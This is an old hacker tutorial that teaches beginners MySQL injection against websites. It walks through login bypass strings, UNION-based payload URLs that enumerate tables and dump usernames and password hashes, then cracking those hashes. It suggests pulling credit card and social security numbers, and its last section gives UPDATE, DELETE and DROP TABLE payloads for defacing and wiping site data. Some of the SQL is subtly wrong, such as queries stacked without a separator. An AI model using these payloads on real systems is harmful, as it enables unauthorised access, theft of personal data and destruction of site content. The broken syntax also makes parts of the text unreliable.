Sql Injection complete tutorial for beginners

1. A Complete MYSQL Tutorial (For Newbies)
2.  
3.  
4.  
5. #########################
6. AUTHOR: SAM207
7. EMAIL: samar_acharya[at]hotmail.com
8.  
9. COPYRIGHT: THIS TUTORIAL CAN BE COPIED AND SHARED ANYWHERE YOU WANT, BUT YOU SHOULD GIVE CREDITS TO ME. THE CONTENTS ALSO SHOULD'NT BR MODIFIED IN ANY WAY. THAT IS ALL..
10.  
11. DISCLAIMER: THIS TUTORIAL IS SOLELY FOR EDUCATIONAL PURPOSES. YOU TAKE FULL RESPONSIBILITY FOR ANY ACTION YOU DO AFTER READING THIS TUTORIAL.
12.  
13. #########################
14.  
15. CONTENTS:
16.  
17. #Intro
18. #What is a database?
19. #What is an SQL injection?
20. #Bypassing logins
21. #Accessing secret data
22. #Checking for vulnerability
23. #Finding the number of columns
24. #Addressing vulnerable part
25. #Finding the MySQL version
26. #MySQL 5 or above injection
27. #MySQL 4 injection
28. #Modifying site content
29. #References
30. #Security sites
31. #Wargamez sites
32. #Greetz and shoutz
33. #THE END
34.  
35.  
36. Intro
37.  
38. Greetz to all, I am sam207. In this tutorial, I will demonstrate the infamous MySQL injection in the newbie perspective so that all the newbies can soon become successful SQL injectors. Also do not be harsh on me if there are any grammatical errors on the tutorial because English is not my native language (I'm from Nepal). Now lets begin our walkthrough of SQL injection.
39.  
40. What Is A Database?
41.  
42. Just some general info.. The database is the application that stores a collection of data. A database offers various APIs for creating, accessing and managing the data it holds. And database (DB) servers can be integrated with our web development so that we can pick up the things we want from the database without much difficulties. A DB may hold various critical information like usernames, passwords, credit cards, etc. So, the DB needs to be secured but many DB servers running are insecure either because of their vulnerability or because of poor programming skills. To name few DB servers: MySQL (Open source), MSSQL, MS-ACCESS, Oracle, Postgre SQL (open source), SQLite, etc.
43.  
44. What Is An SQL Injection?
45.  
46. An SQL injection is probably the most abundant programming flaw that exists on the internet at present. It is the vulnerability through which an unauthorized person can access various critical and private data. The SQL injection is not a flaw in the web or DB server, but is a result of the poor and inexperienced programming practices. And it is one of the deadliest as well as easiest attack to execute from a remote location.
47.  
48.  
49. In SQL injections, we interact with DB server with the various commands and get various data from it. In this tutorial, I would be discussing the 3 aspects of the SQL injection namely bypassing logins, accessing the secret data and modifying the page contents. So lets head forward on our real walkthrough..
50.  
51. Bypassing Logins
52.  
53. Suppose a site has a login form and only the registered users are allowed to enter the site. Now, say you wanted to bypass the login and enter the site as the legitimate user. If the login script is not properly sanitized by the programmer, you may be lucky enough to enter the site. You might be able to log into the site without knowing the real username and real password by just interacting with the DB server. So, isn't that the beauty of SQL injection??
54.  
55. Let's see an example, where the username admin with the password sam207 can log into the site. Suppose the SQL query for this is carried out as below:
56.  
57. SELECT USER from database WHERE username=' admin' AND password='sam207'
58.  
59.  
60. If the above SELECT command evaluates true, the user will be given access to the site otherwise disallowed. Think what we could do if the script is not sanitized.. This opens a door for the hackers to gain illegal access to the site.
61.  
62. In this example, the attacker can enter the following user data in the login form:
63.  
64. Username: a or 1=1--
65. Password: blank
66.  
67. So, this would make our query as:
68.  
69. SELECT USER from database WHERE username=' a' or 1=1-- ' AND password=''
70.  
71.  
72. Note that -- is the comment operator and anything after it will be ignored as a comment. There is also another comment operator: /* both should be tried. So our above query becomes:
73.  
74. SELECT USER from database WHERE username='a' or 1=1
75.  
76.  
77. Now this query evaluates true even if there is no user called 'a' because 1=1 is always true and using OR makes the query return true when one of the queries is true. And this gives access to the sites admin panel.
78.  
79. There can also be various other username and password combinations to play with on vulnerable sites. You can create your own new combinations for the sites login. such as:
80.  
81. username: ' or 1='1 password: ' or 1='1
82. username: ' or '1'='1' password: ' or '1'='1'
83. username: or 1=1 password: or 1=1
84.  
85. and there are many more cheat sheets. Just google it.
86. That's all about bypassing logins.
87.  
88. Accessing Secret Data
89.  
90. An SQL injection is not done for bypassing logins exclusively but it is also used for accessing the sensitive and secret data in the DB servers. This part is long, so I would be discussing in the subsections.
91.  
92. Sub-section 1: Checking for vulnerability
93.  
94. Suppose, you have a site like this:
95.  
96. www.site.com/article.php?id=5
97.  
98. Now to check if it is vulnerable, u would simply add ' in the end i.e. where id variable is assigned. So, it is:
99.  
100. www.site.com/article.php?id=5'
101.  
102. Now if the site is not vulnerable, it will filter and the page will load normally. But if it doesn't filter the query string, it would give an error similar to below:
103.  
104. "MySQL Syntax Error By '5'' In article.php on line 15."
105.  
106. Or an error that tells us to check the correct MySQL version or MySQL Fetch error or sometimes just a blank page. The error may be in any form. But this will confirm that the site is vulnerable.
107.  
108.  
109. Sub-section 2: Find the number of columns
110.  
111.  
112. So now its time to find the number of columns present. For this purpose, we will be using 'order by' until we get an error. That is, we make our URL query as:
113.  
114. www.site.com/article.php?id=5 order by 1/*
115. //this didn't give an error.
116.  
117. Now, I do increase it to 2.
118. www.site.com/article.php?id=5 order by 2/*
119. //still no error
120.  
121. So, we need to increase until we get the error. In my example, I got error when I put the value 3 i.e.
122. www.site.com/article.php?id=5 order by 3/*
123. //this gave me an error.
124.  
125. So, it means there are 2 columns in the current table (3-1=2). This is how we find the number of columns. Sub-section 3: Addressing the vulnerable part
126.  
127.  
128. Now, we need to use the union statement and find the column which we can replace so as to see the secret data on the page.
129. For this we do:
130. www.site.com/article.php?id=5 UNION ALL SELECT 1,2/*
131.  
132.  
133. Now we will see the number(s) on the page somewhere. I mean, either 1 or 2 or both 1 & 2 are seen on the page. So, this means we can replace the number with our commands to display the private data the DB holds.
134.  
135. In my example, 1 is seen on the page. This means, I should replace 1 with my things to proceed further. Got it?? So lets move forward.
136.  
137. Sub-section 4: Finding the MySQL version
138.  
139. For our injection, it is necessary to find the MySQL version because if it is 5, our job becomes lot easier (as version 5 and onwards has a lot more supported commands.) To check the version, there are two MYSQL functions, @@version or version().
140.  
141. So what we do is replace one (which is the replaceable part) with @@version i.e. we do as below:
142.  
143. www.site.com/article.php?id=5 UNION ALL SELECT @@version,2/*
144.  
145.  
146. So, this would return the version of the MySQL running on the server. But, sometimes u may get error with above query. If that is the case, make use of the unhex(hex()) function like this:
147.  
148. www.site.com/article.php?id=UNION ALL SELECT unhex(hex(@@version)),2/*
149.  
150.  
151. Remember that if you have to use the unhex(hex()) function here, you will also have to use this function in the injection process.
152. @@version will give u the version. It may be either 4 or 5 & above. I'm now going to discuss the injection process for version 5 and 4 separately coz as I said earlier, version 5 makes it easy for us to perform the injection.
153.  
154. Sub-section 5: MySQL 5 or above injection
155.  
156.  
157. Here, I am gonna show you how to access data in a server running MySQL 5 or above.You have got the MySQL version 5.0.27 standard using the @@version in URL parameter. MySQL from version 5 has a useful function called information_schema . This is a table that holds information about the tables and columns present in the DB server. That is, it contains name of all tables and columns of the site.
158.  
159. For getting table list, we use: table_name from information_schema.tables
160. For getting column list, we use: column_name from information_schema.columns
161.  
162. So our query for getting the table list in our example would be:
163.  
164. www.site.com/article.php?id=5 UNION ALL SELECT table_name,2 FROM information_schema.tables/*
165.  
166.  
167. And yeah if u had to use unhex(hex()) while finding version, u will have to do:
168.  
169. www.site.com/article.php?id=5 UNION ALL SELECT unhex(hex(table_name)),2 FROM information_schema.tables/*
170.  
171.  
172. This will list all the tables present in the DB. For our purpose, we will be searching for the table containing the user and password information. So we look the probable table with that information. You can even write down the table names for further reference and works. For my example, I would use tbluser as the table that contains user & password.
173.  
174. Similarly, to get the column list we would make our query:
175.  
176. www.site.com/article.php?id=5 UNION ALL SELECT column_name,2 FROM information_schema.columns/*
177.  
178.  
179. This returns all the columns present in the DB server. Now from this listing, we will look for the probable columns for username and password. For my injection, there are two columns holding these info. They are username and password respectively. So that's the column I wanted. You have to search and check the columns until you get no error.
180.  
181. Alternatively to find the column in the specific table, you can do something like below:
182.  
183. www.site.com/article.php?id=5 UNION ALL SELECT column_name,2 FROM information_schema.columns WHERE table_name='tbluser'
184.  
185.  
186. This would display the columns present in the table tbluser . But this may not always work. Let me show you how I got to know that the above two columns belong to table tbluser. Now let me show how to display the username and password stored in the DB.
187.  
188. There is a function called concat() that allows me to join the two columns and display on the page. Also I will be using : (a colon) in the hex form. Its hex value is 0x3a (that's a zero at beginning not the letter "o") What I do is:
189.  
190. www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 FROM tbluser/*
191.  
192.  
193. And this gives me the username and password like below:
194.  
195. admin:9F14974D57DE204E37C11AEAC3EE4940
196.  
197.  
198. Here the password is hashed and in this case, its MD5. Now you need to get the hash cracker like John The Ripper (www.openwalls.org), Cain & Able (www.oxid.it) and crack the hash. The hash may be different like SHA1 (Note: SD1 hashes are usually a multiple of 20 characters long whereas an md5 hash is usually 32 characters long) or sometimes plaintext password may be shown on the page. In this case, when I crack I get the password as sam207.
199.  
200. Now you get to the admin login page and login as admin. Then you can do whatever you like. So that's all for the MySQL version 5.
201.  
202. Sub-section 6: MySQL 4 injection
203.  
204. Now say your victim has MySQL version 4. Then u won't be able to get the table name and column name as in MySQL version 5 because it lacks support for information_schema.tables and information_schema.columns.
205.  
206. So now you will have to guess the table name and column name until you do not get any errors. For example, you would do as below:
207.  
208. www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM user/*
209.  
210.  
211. Here, I guessed the table name as user. But this gave me the error because the table with the name user didn't exist on the DB. Now I kept on guessing for the table name until I didn't get error.
212. When I put the table name as tbluser , the page loaded normally. So I came to know that the table tbluser exists.
213.  
214. www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM tbluser/*
215.  
216.  
217. The page loaded normally. Now again you have to guess the column names present in the tbluser table. I do something like below:
218.  
219. www.site.com/article.php?id=5 UNION ALL SELECT user_name,2 FROM tbluser/*
220. //this gave me error so there is no column with this name.
221.  
222. www.site.com/article.php?id=5 UNION ALL SELECT username,2 FROM tbluser/*
223. //It loaded the page normally along with the username from the table.
224.  
225. www.site.com/article.php?id=5 UNION ALL SELECT pass,2 FROM tbluser/*
226. //it produced an error so again the column pass does not exist in the table tbluser.
227.  
228. www.site.com/article.php?id=5 UNION ALL SELECT password,2 FROM tbluser/*
229. //the page loaded normally with password hash (or plaintext password).
230.  
231. Now you may do this:
232.  
233. www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 FROM tbluser/*
234.  
235.  
236. admin:9F14974D57DE204E37C11AEAC3EE4940
237.  
238.  
239.  
240. On cracking, I got sam207 as a password. Now I just need to login the site and do whatever I want. A few table names u may try are: user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc.
241.  
242. You may try these methods to get various data such as credit card numbers, social security numbers, etc. Just what u need to do is figure out the columns and get them displayed on the vulnerable page. That's all on the injection for accessing secret data.
243.  
244. Modifying Site Content
245.  
246. Sometimes you find the vulnerable site and get everything needed but maybe the admin login doesn't exist or it is inaccessible for a certain IP range. Even in that context, you can use some kewl SQL commands for modifying the site content. I haven't seen much articles addressing this one so thought to include it here.
247.  
248. Here, I will basically talk about a few SQL commands you may use to change the site content. The commands are the workhorse of MySQL and are deadly when executed. First let me list these commands:
249.  
250. UPDATE: It is used to edit information already in the db without deleting any rows.
251. DELETE: It is used to delete the contents of one or more fields.
252. DROP: It is used completely delete a table & all its associated data.
253.  
254. Now, you could have figured out that these commands can be very destructive if the site lets us interact with DB with no sanitization and proper permissions. Command Usage:
255.  
256. UPDATE : Our vulnerable page is:
257. www.site.com/article.php?id=5
258. Lets say the query is:
259.  
260. SELECT title,data,author FROM article WHERE id=5
261.  
262.  
263. Though in reality, we don't know the query as above, we can find the table and column name as discussed earlier.
264. So we would do:
265.  
266. www.site.com/article.php?id=5 UPDATE article SET title='Hacked By sam207'/*
267.  
268.  
269. or, u could alternatively do:
270.  
271. www.site.com/article.php?id=5 UPDATE article SET title='HACKED BY SAM207',data='Ur site has zero
272. security',author='sam207'/*
273.  
274.  
275. By executing first query, we have set the title value as 'Hacked By sam207' in the table article while in second query, we have updated all three fields title, data, & author in the table article. Sometimes, you may want to change the specific page with id=5. For this u will do:
276.  
277. www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/*
278.  
279.  
280. DELETE: As already stated, this deletes the content of one or more fields permanently from the DB server.
281. The syntax is:
282.  
283. www.site.com/article.php?id=5 DELETE title,data,author FROM article/*
284.  
285.  
286. Or if you want to delete these fields from the id=5, you will do:
287.  
288. www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/*
289.  
290.  
291. DROP: This is another deadly command you can use. With this, you can delete a table & all of its associated data. For this, we make our URL as:
292.  
293. www.site.com/article.php?id=5 DROP TABLE article/*
294.  
295. This would delete table article & all its contents.
296.  
297. Finally, I want to say little about ; (the semi colon) Though I have not used this in my tutorial, you can use it to end your first query and start another one. This semicolon can be kept at the end of our first query so that we can start new query after it.
298.  
299. References:
300.  
301. www.google.com.np
302. www.milw0rm.com
303. www.gonullyourself.org
304. www.darkmindz.com
305.  
306.  
307. Security Sites:
308.  
309. There are many security and exploit sites where you can learn new things. A few examples are:
310.  
311. www.packetstormsecurity.org
312. www.milw0rm.com
313. www.securityfocus.com
314. www.insecure.org
315. www.securiteam.com
316.  
317. Wargamez Sites:
318.  
319. To learn hacking, you need practice and there are sites which offer you a legal platform to learn hacking through hacking wargames. Some are:
320.  
321. www.hellboundhackers.org
322. www.hackthissite.org
323. www.dareyourmind.net
324. www.thisislegal.com
325.  
326. GREETZ & SHOUTZ:
327.  
328. Greetz to all at darkmindz. Load of shoutz to pSyChO mOnkee and sToRm (U two guys rock) and all at GNY. Also greet to t0mmy9 (Thanks for always helping me learn things) at www.thisislegal.com
329.  
330. And hi to all my classmates bigyan musa, bhakunde sameer, gainda sandeep, joe haatti, dipesh bhedo, eman bhainsi, milan biralo, nikesh gandeula (Pheretima posthuma) & all my other classmates. Without you guys, I'm having boring days in my biology class. Hope to meet u all guys. And I wish bright future of you guys. Become successful doctors..
331.  
332. The End
333.  
334. With this, my tutorial which was mainly intended for newbies, ends here. I hope you liked my tutorial. I will hopefully write new tutorials in newbie concept after I teach myself all these things. Any comments can be dropped at samar_acharya[at]hotmail.com
335. And finally, read more and more, ask more and more and that's the best way to learn the things.
336. Keep Hacking & Enjoy It.
337.  
338. REGARDS~
339. sam207